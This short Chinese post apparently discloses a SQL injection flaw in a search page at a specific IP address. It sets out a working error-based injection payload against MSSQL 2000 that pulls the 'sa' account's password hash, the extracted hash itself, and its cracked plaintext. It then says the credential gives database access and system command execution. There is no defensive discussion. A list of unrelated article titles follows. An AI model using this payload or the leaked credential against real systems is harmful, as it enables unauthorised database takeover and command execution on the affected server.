漏洞位置:http://168.1.1.81/Information/Search?Keyword=1111

漏洞利用:

MSSQL 2000

http://168.1.1.81/Information/Search

?Keyword=1111%' AND (Select  master.dbo.fn_varbintohexstr(password) from master.dbo.sysxlogins where name='sa')=1 AND '%'='

0x01004c1b357f3ec7762474fab54f2b33547d20d09118fa8b03ca71ac5dda51c01e4146de5e78693a4789b01193f2

Cmd5 解密:teamlead

通过数据库连接 sa/ teamlead 连入数据库执行系统命令

最新文章

  1. Codeforces 682C Alyona and the Tree(树形DP)
  2. 初识Python第二天(1)
  3. SVN--分支、合并
  4. 使用GoodFeaturesToTrack进行关键点检测---29
  5. Qt5 Addin 出现问题模块计算机类型“x64”与目标计算机类型“X86”冲突
  6. 【BZOJ】【4003】【JLOI2015】城池攻占
  7. ansible控制windows的官方翻译
  8. iOS LLDB调试器
  9. Explain 结果解读与实践
  10. mysql 语句总结
  11. 浅谈lvs和nginx的一些优点和缺点
  12. easyUI带复选框的组合树
  13. Java中的集合框架(中)
  14. IIS Express URL Rewrite无效
  15. SQL-记录查询篇-009
  16. tomcat-四种运行模式和三种部署模式(优化)
  17. Python之密度聚类
  18. 矩阵分解-----LDL分解
  19. ZJOI2018酱油记
  20. docker_Dockerfile_docker hub简单使用搭建nginx

热门文章

  1. jQuery获取各种标签的文本和value值
  2. load average 定义(网易面试)
  3. opener和parent的区别
  4. vue+elementui项目打包后样式变化问题
  5. 在HPC的节点上使用jupyter notebook
  6. Spring 事务小结
  7. Android相关视频
  8. 【转】MySQL的安装与配置——详细教程-window系统下
  9. 【FPGA】always (*) 后代码全部显示注释字体的颜色之解决方法
  10. python异常值(outlier)检测实战:KMeans + PCA + IsolationForest + SVM + EllipticEnvelope